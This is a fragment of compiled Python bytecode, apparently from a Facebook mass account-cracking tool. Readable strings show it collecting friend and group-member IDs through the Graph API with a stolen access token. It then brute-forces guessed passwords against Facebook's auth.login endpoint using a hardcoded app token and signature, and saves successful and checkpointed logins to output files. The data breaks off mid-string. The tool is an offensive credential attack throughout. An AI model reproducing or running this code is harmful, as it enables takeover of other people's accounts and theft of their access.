\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadRv\x00\x00\x00R\x16\x00\x00\x00R,\x00\x00\x00(\x10\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00pz1Rl\x00\x00\x00Ro\x00\x00\x00t\x03\x00\x00\x00pz2t\x03\x00\x00\x00pz3t\x05\x00\x00\x00lahirt\x03\x00\x00\x00pz4t\x06\x00\x00\x00lahirst\x03\x00\x00\x00gazt\x03\x00\x00\x00pz5t\x03\x00\x00\x00pz6t\x03\x00\x00\x00pz7(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xab\x00\x00\x00\xe5\x03\x00\x00s@\x01\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x03\x01\x0c\x01\n\x01\x1b\x01\x12\x01\r\x01\n\x01\r\x01\n\x01\r\x01\t\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s6\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00a\n\x00t\t\x00d\x08\x00\x83\x01\x00a\x0b\x00y~\x00t\x02\x00t\n\x00d\x03\x00\x83\x02\x00a\x0c\x00t\r\x00d\t\x00\x83\x01\x00\x01xC\x00t\x0e\x00d\n\x00\x83\x01\x00D]5\x00}\x01\x00t\x0f\x00j\x10\x00d\x0b\x00t\x11\x00d\x0c\x00d\x0f\x00\x83\x00\x02}\x02\x00|\x02\x00j\x12\x00\x83\x00\x00\x01t\x13\x00j\x14\x00|\x02\x00\x83\x01\x00\x01q\xb3\x00Wx\x18\x00t\x13\x00D]\x10\x00}\x02\x00|\x02\x00j\x15\x00\x83\x00\x00\x01q\xf3\x00WWn\'\x00\x04t\x04\x00k\n\x00r1\x01\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97ms+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i(\x00\x00\x00t\x06\x00\x00\x00targett\x04\x00\x00\x00argss\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](\x00\x00\x00\x00(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00idlistt\x05\x00\x00\x00passwt\x04\x00\x00\x00fileR \x00\x00\x00t\x05\x00\x00\x00ranget\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x05\x00\x00\x00scrakt\x05\x00\x00\x00startt\x07\x00\x00\x00threadsR\x94\x00\x00\x00t\x04\x00\x00\x00joinRv\x00\x00\x00(\x03\x00\x00\x00R4\x00\x00\x00R\x10\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xac\x00\x00\x00\x98\x04\x00\x00s2\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x0f\x01\n\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sg\x02\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r$\x00\x01\x01\x01n\x01\x00Xy\xfd\x01t\x03\x00t\x04\x00d\x02\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00x\xd5\x01t\x08\x00r \x02t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x03\x00|\x01\x00\x17d\x04\x00\x17t\x0b\x00\x17d\x05\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x10\x00t\x11\x00t\x07\x00\x83\x01\x00k\x02\x00r\xae\x00Pn\x00\x00d\x06\x00|\x04\x00k\x06\x00rE\x01t\x03\x00d\x07\x00d\x08\x00\x83\x02\x00}\x05\x00|\x05\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00d\x06\x00\x19\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x16\x00|\x06\x00j\x17\x00\x83\x01\x00}\x07\x00t\x18\x00j\x19\x00d\r\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17d\x0e\x00\x17|\x07\x00d\x0f\x00\x19\x17\x83\x01\x00\x01nu\x00d\x10\x00|\x04\x00d\x11\x00\x19k\x06\x00r\xa3\x01t\x03\x00d\x12\x00d\x08\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01t\x1a\x00j\x19\x00d\x13\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17\x83\x01\x00\x01n\x17\x00t\x1b\x00j\x19\x00|\x01\x00\x83\x01\x00\x01t\x10\x00d\x14\x007a\x10\x00t\x1c\x00j\x1d\x00j\x12\x00d\x15\x00t\x1e\x00t\x10\x00\x83\x01\x00\x17d\x16\x00\x17t\x1e\x00t\x11\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17d\x17\x00\x17t\x1e\x00t\x11\x00t\x18\x00\x83\x01\x00\x83\x01\x00\x17d\x18\x00\x17t\x1e\x00t\x11\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x1c\x00j\x1d\x00j\x1f\x00\x83\x00\x00\x01qL\x00WWn>\x00\x04t \x00k\n\x00rG\x02\x01\x01\x01d\x19\x00GHt!\x00j"\x00d\x14\x00\x83\x01\x00\x01n\x1c\x00\x04t\x14\x00j#\x00j$\x00k\n\x00rb\x02\x01\x01\x01d\x1a\x00GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00NR\x90\x00\x00\x00R\'\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00out/mbf_ok.txtR\x11\x00\x00\x00t\x01\x00\x00\x00|s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m ] s\x03\x00\x00\x00 =>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x0e\x00\x00\x00out/mbf_cp.txts\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m ] i\x01\x00\x00\x00s<\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m s\x11\x00\x00\x00 \x1b[1;96m>\x1b[1;97m s\x1d\x00\x00\x00 =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96ms%\x00\x00\x00 \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96ms\x11\x00\x00\x00\n\x1b[1;91m[!] Sleeps\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(%\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R)\x00\x00\x00R\xca\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00splitt\x02\x00\x00\x00upR\xcc\x00\x00\x00t\x08\x00\x00\x00readlinet\x05\x00\x00\x00stripR\xcb\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00Rd\x00\x00\x00R\xbd\x00\x00\x00t\x04\x00\x00\x00backR\x0e\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00berhasilR\x94\x00\x00\x00t\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x06\x00\x00\x00R\x18\x00\x00\x00R\x17\x00\x00\x00R\x1b\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00(\t\x00\x00\x00t\x04\x00\x00\x00bukat\x08\x00\x00\x00usernameRk\x00\x00\x00Rl\x00\x00\x00t\x04\x00\x00\x00mpsht\x04\x00\x00\x00bisaR\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xd0\x00\x00\x00\xb4\x04\x00\x00sF\x00\x00\x00\x00\x02\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x01\x04\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x1f\x01\x12\x01(\x01\x10\x01\x0f\x01\x19\x01\n\x01\x1c\x02\r\x01\n\x01V\x00\x15\x01\r\x01\x05\x01\x10\x01\x13\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s_\x00\x00\x00Hd\x01\x00d\x02\x00\x14GHx\x13\x00t\x00\x00D]\x0b\x00}\x00\x00|\x00\x00GHq\x11\x00Wx\x13\x00t\x01\x00D]\x0b\x00}\x01\x00|\x01\x00GHq\'\x00Wd\x01\x00d\x02\x00\x14GHd\x03\x00t\x02\x00t\x03\x00t\x04\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ni*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00\x1b[31m[x] Failed \x1b[1;97m--> (\x06\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\xdc\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00c(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xad\x00\x00\x00\xda\x04\x00\x00s\x12\x00\x00\x00\x00\x01\x01\x01\t\x02\r\x01\t\x02\r\x01\t\x02\t\x01\x15\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x15\x00\x00\x001]. Crack list friends\x16\x00\x00\x002]. Crack from friends\x1b\x00\x00\x003]. Crack from member groups\x08\x00\x00\x000]. Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00pilih_super(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xae\x00\x00\x00\xe9\x04\x00\x00s \x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0f\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x84\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n|\x02|\x00\x00d\x04\x00k\x02\x00r\x9d\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x05\x00d\x06\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x07\x00t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x,\x02|\x02\x00d\x08\x00\x19D]\x17\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00d\t\x00\x19\x83\x01\x00\x01q\x7f\x00Wn\x06\x02|\x00\x00d\n\x00k\x02\x00r\x8f\x01t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x0b\x00\x83\x01\x00}\x04\x00y>\x00t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\r\x00\x17t\x08\x00\x17\x83\x01\x00}\x05\x00t\t\x00j\n\x00|\x05\x00j\x0b\x00\x83\x01\x00}\x06\x00d\x0e\x00|\x06\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r.\x01\x01\x01\x01d\x10\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x12\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\x13\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x:\x01|\x02\x00d\x08\x00\x19D]\x17\x00}\x07\x00t\x0c\x00j\r\x00|\x07\x00d\t\x00\x19\x83\x01\x00\x01qq\x01Wn\x14\x01|\x00\x00d\x14\x00k\x02\x00r\x81\x02t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x08\x00y>\x00t\x06\x00j\x07\x00d\x16\x00|\x08\x00\x17d\x17\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\t\x00d\x18\x00|\t\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r \x02\x01\x01\x01d\x19\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x08\x00\x17d\x1b\x00\x17t\x08\x00\x17\x83\x01\x00}\n\x00t\t\x00j\n\x00|\n\x00j\x0b\x00\x83\x01\x00}\x03\x00xH\x00|\x03\x00d\x08\x00\x19D]\x17\x00}\x0b\x00t\x0c\x00j\r\x00|\x0b\x00d\t\x00\x19\x83\x01\x00\x01qc\x02Wn"\x00|\x00\x00d\x1c\x00k\x02\x00r\x97\x02t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x1d\x00t\x11\x00t\x12\x00t\x0c\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00d \x00d!\x00g\x03\x00}\x0c\x00x0\x00|\x0c\x00D](\x00}\r\x00d"\x00|\r\x00\x17Gt\x13\x00j\x14\x00j\x15\x00\x83\x00\x00\x01t\x16\x00j\x17\x00d#\x00\x83\x01\x00\x01q\xd8\x02WHd$\x00d%\x00\x14GHd&\x00\x84\x00\x00}\x0e\x00t\x18\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x19\x00|\x0e\x00t\x0c\x00\x83\x02\x00\x01d$\x00d%\x00\x14GHd(\x00GHd)\x00t\x11\x00t\x12\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x11\x00t\x12\x00t\x1b\x00\x83\x01\x00\x83\x01\x00\x17GHd+\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R&\x00\x00\x00s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00Rj\x00\x00\x00R9\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all id from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=Rs\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=R:\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s0\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97mi\x01\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90c\x01\x00\x00\x00\x0e\x00\x00\x00\x05\x00\x00\x00S\x00\x00\x00sZ\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy!\x05t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\x03\x00\x17t\x05\x00\x17\x83\x01\x00}\x02\x00t\x06\x00j\x07\x00|\x02\x00j\x08\x00\x83\x01\x00}\x03\x00|\x03\x00d\x04\x00\x19d\x05\x00\x17}\x04\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x04\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x05\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01nF\x04d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00r[\x01t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x04\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\xf0\x03d\x14\x00}\n\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\n\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\n\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01nN\x03d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x02t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\n\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01n\xf8\x02|\x03\x00d\x04\x00\x19d\x15\x00\x17}\x0b\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0b\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x02t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0b\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01nN\x02d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x03t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0b\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n\xf8\x01d\x16\x00}\x0c\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0c\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x03t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0c\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01nV\x01d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x04t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0c\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x00\x01|\x03\x00d\x17\x00\x19d\x05\x00\x17}\r\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\r\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x04t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\r\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01nV\x00d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x05t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\r\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00NR\x90\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0f\x00\x00\x00/?access_token=R\xb2\x00\x00\x00R\xb7\x00\x00\x00s\x9